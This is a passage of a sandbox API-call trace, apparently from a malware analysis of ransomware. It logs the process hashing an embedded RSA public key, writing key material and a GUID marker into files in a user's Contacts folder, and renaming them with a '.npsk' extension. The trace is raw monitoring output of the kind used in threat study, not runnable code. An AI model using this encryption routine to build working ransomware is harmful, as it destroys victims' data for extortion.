1 [0212.757] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0212.757] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0212.758] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x11) returned 0x32728a8 [0212.758] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0212.758] GetLastError () returned 0x0 [0212.758] SetLastError (dwErrCode=0x0) [0212.758] GetLastError () returned 0x0 [0212.758] SetLastError (dwErrCode=0x0) [0212.758] GetLastError () returned 0x0 [0212.758] SetLastError (dwErrCode=0x0) [0212.758] GetLastError () returned 0x0 [0212.758] SetLastError (dwErrCode=0x0) [0212.758] GetLastError () returned 0x0 [0212.758] SetLastError (dwErrCode=0x0) [0212.758] GetLastError () returned 0x0 [0212.758] SetLastError (dwErrCode=0x0) [0212.758] GetLastError () returned 0x0 [0212.758] SetLastError (dwErrCode=0x0) [0212.758] GetLastError () returned 0x0 [0212.758] SetLastError (dwErrCode=0x0) [0212.758] GetLastError () returned 0x0 [0212.758] SetLastError (dwErrCode=0x0) [0212.758] GetLastError () returned 0x0 [0212.758] SetLastError (dwErrCode=0x0) [0212.758] GetLastError () returned 0x0 [0212.758] SetLastError (dwErrCode=0x0) [0212.758] GetLastError () returned 0x0 [0212.758] SetLastError (dwErrCode=0x0) [0212.759] GetLastError () returned 0x0 [0212.759] SetLastError (dwErrCode=0x0) [0212.759] GetLastError () returned 0x0 [0212.759] SetLastError (dwErrCode=0x0) [0212.759] GetLastError () returned 0x0 [0212.759] SetLastError (dwErrCode=0x0) [0212.759] GetLastError () returned 0x0 [0212.759] SetLastError (dwErrCode=0x0) [0212.759] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0212.759] GetLastError () returned 0x0 [0212.759] SetLastError (dwErrCode=0x0) [0212.759] GetLastError () returned 0x0 [0212.759] SetLastError (dwErrCode=0x0) [0212.759] GetLastError () returned 0x0 [0212.759] SetLastError (dwErrCode=0x0) [0212.759] GetLastError () returned 0x0 [0212.759] SetLastError (dwErrCode=0x0) [0212.759] GetLastError () returned 0x0 [0212.759] SetLastError (dwErrCode=0x0) [0212.759] GetLastError () returned 0x0 [0212.759] SetLastError (dwErrCode=0x0) [0212.759] GetLastError () returned 0x0 [0212.759] SetLastError (dwErrCode=0x0) [0212.759] GetLastError () returned 0x0 [0212.759] SetLastError (dwErrCode=0x0) [0212.759] GetLastError () returned 0x0 [0212.759] SetLastError (dwErrCode=0x0) [0212.760] GetLastError () returned 0x0 [0212.760] SetLastError (dwErrCode=0x0) [0212.760] GetLastError () returned 0x0 [0212.760] SetLastError (dwErrCode=0x0) [0212.760] GetLastError () returned 0x0 [0212.760] SetLastError (dwErrCode=0x0) [0212.760] GetLastError () returned 0x0 [0212.760] SetLastError (dwErrCode=0x0) [0212.760] GetLastError () returned 0x0 [0212.760] SetLastError (dwErrCode=0x0) [0212.760] GetLastError () returned 0x0 [0212.760] SetLastError (dwErrCode=0x0) [0212.760] GetLastError () returned 0x0 [0212.760] SetLastError (dwErrCode=0x0) [0212.760] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323db00 [0212.760] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0212.760] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32728a8 | out: hHeap=0x750000) returned 1 [0212.760] CryptDestroyHash (hHash=0x3277d68) returned 1 [0212.760] CryptReleaseContext (hProv=0x7b20a0, dwFlags=0x0) returned 1 [0212.760] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0212.760] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0212.760] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0212.760] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da90 [0212.760] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0212.760] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0212.760] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323db00 [0212.760] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x10b20) returned 0x3a8af88 [0212.762] SetFilePointer (in: hFile=0x61c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0212.762] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da90 | out: hHeap=0x750000) returned 1 [0212.762] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x200) returned 0x328bd38 [0212.762] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da90 [0212.762] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x200) returned 0x32ef680 [0212.762] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x58) returned 0x327a5e8 [0212.762] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x32534f8 [0212.762] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x3a87090 [0212.762] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x3253588 [0212.762] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x3a87108 [0212.762] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x3a870f0 [0212.762] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x3a87120 [0212.763] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x3a87138 [0212.763] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x24) returned 0x3279af8 [0212.763] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x158) returned 0x3225448 [0212.763] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3225448, Size=0x218) returned 0x32ef888 [0212.763] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x558) returned 0x3a9bab0 [0212.763] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a870f0 | out: hHeap=0x750000) returned 1 [0212.763] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a87138 | out: hHeap=0x750000) returned 1 [0212.763] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a87120 | out: hHeap=0x750000) returned 1 [0212.763] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3279af8 | out: hHeap=0x750000) returned 1 [0212.763] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a9bab0 | out: hHeap=0x750000) returned 1 [0212.763] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x3a87120 [0212.763] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x8) returned 0x84f398 [0212.763] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x10) returned 0x3a87138 [0212.763] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x18) returned 0x32728c8 [0212.763] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x9) returned 0x3a870f0 [0212.763] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x8) returned 0x84f378 [0212.763] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x10e) returned 0x3217e98 [0212.763] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0212.763] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x58) returned 0x327a588 [0212.763] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x14) returned 0x32728a8 [0212.763] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x104) returned 0x3a86078 [0212.763] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x14) returned 0x32728e8 [0212.763] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x4) returned 0x84f3d8 [0212.764] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0212.764] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a87138 | out: hHeap=0x750000) returned 1 [0212.764] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x84f378 | out: hHeap=0x750000) returned 1 [0212.764] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a870f0 | out: hHeap=0x750000) returned 1 [0212.764] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32728c8 | out: hHeap=0x750000) returned 1 [0212.764] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x84f398 | out: hHeap=0x750000) returned 1 [0212.764] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a87120 | out: hHeap=0x750000) returned 1 [0212.764] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0212.764] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x327a5e8 | out: hHeap=0x750000) returned 1 [0212.764] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32ef888 | out: hHeap=0x750000) returned 1 [0212.765] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x10b1e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.765] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0212.765] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0212.765] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x82d598 [0212.765] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x428) returned 0x32ef680 [0212.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x32ef680, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0212.765] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x430) returned 0x3a8af88 [0212.765] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32ef680 | out: hHeap=0x750000) returned 1 [0212.765] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x82d598 | out: hHeap=0x750000) returned 1 [0212.765] WriteFile (in: hFile=0x61c, lpBuffer=0x3a8af88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3a8af88*, lpNumberOfBytesWritten=0x397fb50*=0x28, lpOverlapped=0x0) returned 1 [0212.765] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a8af88 | out: hHeap=0x750000) returned 1 [0212.765] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0212.765] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0212.766] CloseHandle (hObject=0x61c) returned 1 [0212.769] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x80) returned 0x7b20a0 [0212.769] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x890) returned 0x3a8af88 [0212.769] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7b20a0 | out: hHeap=0x750000) returned 1 [0212.769] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.npsk")) returned 1 [0212.770] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a8af88 | out: hHeap=0x750000) returned 1 [0212.770] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0212.770] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0212.771] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7b1d70 | out: hHeap=0x750000) returned 1 [0212.771] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 1 [0212.771] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3241248 [0212.771] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x80) returned 0x7b1d70 [0212.771] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3241248 | out: hHeap=0x750000) returned 1 [0212.771] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned=".contact" [0212.771] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0212.772] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=1171) returned 1 [0212.772] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0212.774] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x46d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.774] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0212.796] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323db00 [0212.796] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0212.797] SetFilePointer (in: hFile=0x61c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.797] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x493, lpOverlapped=0x0) returned 1 [0212.797] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0212.797] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x1f6) returned 0x7a79b8 [0212.797] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0212.797] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0212.797] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b20a0) returned 1 [0212.798] CryptCreateHash (in: hProv=0x7b20a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0212.798] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0212.798] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0212.798] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x11) returned 0x32728a8 [0212.798] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0212.798] GetLastError () returned 0x0 [0212.798] SetLastError (dwErrCode=0x0) [0212.798] GetLastError () returned 0x0 [0212.798] SetLastError (dwErrCode=0x0) [0212.799] GetLastError () returned 0x0 [0212.799] SetLastError (dwErrCode=0x0) [0212.799] GetLastError () returned 0x0 [0212.799] SetLastError (dwErrCode=0x0) [0212.799] GetLastError () returned 0x0 [0212.799] SetLastError (dwErrCode=0x0) [0212.799] GetLastError () returned 0x0 [0212.799] SetLastError (dwErrCode=0x0) [0212.799] GetLastError () returned 0x0 [0212.799] SetLastError (dwErrCode=0x0) [0212.799] GetLastError () returned 0x0 [0212.799] SetLastError (dwErrCode=0x0) [0212.799] GetLastError () returned 0x0 [0212.799] SetLastError (dwErrCode=0x0) [0212.799] GetLastError () returned 0x0 [0212.799] SetLastError (dwErrCode=0x0) [0212.799] GetLastError () returned 0x0 [0212.799] SetLastError (dwErrCode=0x0) [0212.799] GetLastError () returned 0x0 [0212.799] SetLastError (dwErrCode=0x0) [0212.799] GetLastError () returned 0x0 [0212.799] SetLastError (dwErrCode=0x0) [0212.799] GetLastError () returned 0x0 [0212.800] SetLastError (dwErrCode=0x0) [0212.800] GetLastError () returned 0x0 [0212.800] SetLastError (dwErrCode=0x0) [0212.800] GetLastError () returned 0x0 [0212.800] SetLastError (dwErrCode=0x0) [0212.800] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0212.800] GetLastError () returned 0x0 [0212.800] SetLastError (dwErrCode=0x0) [0212.800] GetLastError () returned 0x0 [0212.800] SetLastError (dwErrCode=0x0) [0212.800] GetLastError () returned 0x0 [0212.800] SetLastError (dwErrCode=0x0) [0212.800] GetLastError () returned 0x0 [0212.800] SetLastError (dwErrCode=0x0) [0212.800] GetLastError () returned 0x0 [0212.800] SetLastError (dwErrCode=0x0) [0212.800] GetLastError () returned 0x0 [0212.800] SetLastError (dwErrCode=0x0) [0212.800] GetLastError () returned 0x0 [0212.800] SetLastError (dwErrCode=0x0) [0212.801] GetLastError () returned 0x0 [0212.801] SetLastError (dwErrCode=0x0) [0212.801] GetLastError () returned 0x0 [0212.801] SetLastError (dwErrCode=0x0) [0212.801] GetLastError () returned 0x0 [0212.801] SetLastError (dwErrCode=0x0) [0212.801] GetLastError () returned 0x0 [0212.801] SetLastError (dwErrCode=0x0) [0212.801] GetLastError () returned 0x0 [0212.801] SetLastError (dwErrCode=0x0) [0212.801] GetLastError () returned 0x0 [0212.801] SetLastError (dwErrCode=0x0) [0212.801] GetLastError () returned 0x0 [0212.801] SetLastError (dwErrCode=0x0) [0212.801] GetLastError () returned 0x0 [0212.801] SetLastError (dwErrCode=0x0) [0212.801] GetLastError () returned 0x0 [0212.801] SetLastError (dwErrCode=0x0) [0212.801] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323db00 [0212.802] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0212.802] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32728a8 | out: hHeap=0x750000) returned 1 [0212.802] CryptDestroyHash (hHash=0x3277d68) returned 1 [0212.802] CryptReleaseContext (hProv=0x7b20a0, dwFlags=0x0) returned 1 [0212.802] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0212.802] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0212.802] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0212.802] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da90 [0212.802] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0212.802] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0212.802] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323db00 [0212.802] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x490) returned 0x32ef680 [0212.802] SetFilePointer (in: hFile=0x61c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0212.802] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da90 | out: hHeap=0x750000) returned 1 [0212.802] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x200) returned 0x32efb18 [0212.802] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da90 [0212.802] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x200) returned 0x328bd38 [0212.802] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x58) returned 0x327a588 [0212.802] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x3253588 [0212.802] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x3a87108 [0212.803] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x32535d0 [0212.803] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x3a870d8 [0212.803] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x3a87138 [0212.803] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x3a87150 [0212.803] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x3a870a8 [0212.803] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x24) returned 0x3279af8 [0212.803] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x158) returned 0x3225448 [0212.803] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3225448, Size=0x218) returned 0x3a8af88 [0212.803] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x558) returned 0x3a8b1a8 [0212.803] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a87138 | out: hHeap=0x750000) returned 1 [0212.803] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a870a8 | out: hHeap=0x750000) returned 1 [0212.803] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a87150 | out: hHeap=0x750000) returned 1 [0212.803] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3279af8 | out: hHeap=0x750000) returned 1 [0212.803] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a8b1a8 | out: hHeap=0x750000) returned 1 [0212.803] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x3a87150 [0212.803] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x8) returned 0x84f3d8 [0212.803] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x10) returned 0x3a870a8 [0212.803] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x18) returned 0x32728e8 [0212.803] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x9) returned 0x3a87138 [0212.803] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x8) returned 0x84f378 [0212.803] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x10e) returned 0x3217e98 [0212.803] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0212.803] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x58) returned 0x327a5e8 [0212.804] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x14) returned 0x32728a8 [0212.804] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x104) returned 0x3a86078 [0212.804] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x14) returned 0x32728c8 [0212.804] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x4) returned 0x84f388 [0212.804] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0212.804] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a870a8 | out: hHeap=0x750000) returned 1 [0212.804] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x84f378 | out: hHeap=0x750000) returned 1 [0212.804] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a87138 | out: hHeap=0x750000) returned 1 [0212.804] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32728e8 | out: hHeap=0x750000) returned 1 [0212.804] HeapFree (in: hHeap=0x750000, dwFlags=0x0, 